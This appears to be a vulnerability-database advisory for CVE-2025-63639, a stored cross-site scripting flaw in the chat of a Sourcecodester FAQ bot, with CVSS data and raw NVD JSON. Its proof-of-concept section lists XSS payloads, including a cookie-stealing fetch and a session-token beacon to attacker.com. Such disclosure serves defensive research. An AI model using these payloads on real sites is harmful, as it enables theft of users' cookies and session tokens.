Security Vulnerability Report
中文
CVE-2025-63639 CVSS 6.1 MEDIUM

CVE-2025-63639

Published: 2025-11-07 20:15:38
Last Modified: 2025-11-17 18:55:26
Source: [email protected]

Description

The chat feature in the application Sourcecodester FAQ Bot with AI Assistant v1.0 is vulnerable to Cross-Site Scripting (XSS) due to improper handling of user-supplied input. An attacker can inject malicious HTML or JavaScript into chat messages, which executes in the browser of any user viewing the conversation.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:remyandrade:faq_bot_with_ai_assistant:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester FAQ Bot with AI Assistant v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-63639 PoC - Stored XSS in FAQ Bot Chat --> <!-- Attack Vector: Inject malicious JavaScript via chat message input --> <!-- Basic XSS Payload --> <script>alert('XSS');</script> <!-- Image Tag Event Handler XSS --> <img src=x onerror=alert(document.cookie)> <!-- SVG Element XSS --> <svg/onload=alert('XSS')> <!-- Body Event Handler XSS --> <body onload=alert(document.location)> <!-- iFrame XSS --> <iframe src=javascript:alert('XSS')> <!-- Cookie Stealing Payload --> <script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script> <!-- Session Hijacking Payload --> <script>var img=new Image();img.src='https://attacker.com/log?data='+sessionStorage.getItem('token');</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63639", "sourceIdentifier": "[email protected]", "published": "2025-11-07T20:15:38.113", "lastModified": "2025-11-17T18:55:26.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The chat feature in the application Sourcecodester FAQ Bot with AI Assistant v1.0 is vulnerable to Cross-Site Scripting (XSS) due to improper handling of user-supplied input. An attacker can inject malicious HTML or JavaScript into chat messages, which executes in the browser of any user viewing the conversation."}, {"lang": "es", "value": "La función de chat en la aplicación Sourcecodester FAQ Bot con Asistente de IA v1.0 es vulnerable a Cross-Site Scripting (XSS) debido a un manejo inadecuado de la entrada proporcionada por el usuario. Un atacante puede inyectar HTML o JavaScript malicioso en los mensajes de chat, que se ejecuta en el navegador de cualquier usuario que vea la conversación."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:faq_bot_with_ai_assistant:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "999FC52A-4EE9-4869-8E8E-2D93D3BC84F8"}]}]}], "references": [{"url": "https://github.com/ChuckBartowski7/Vulnerability-Research/blob/main/CVE-2025-63639/README.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/javascript/18413/faq-bot-ai-assistant-using-html-css-and-javascript-source-code.html", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.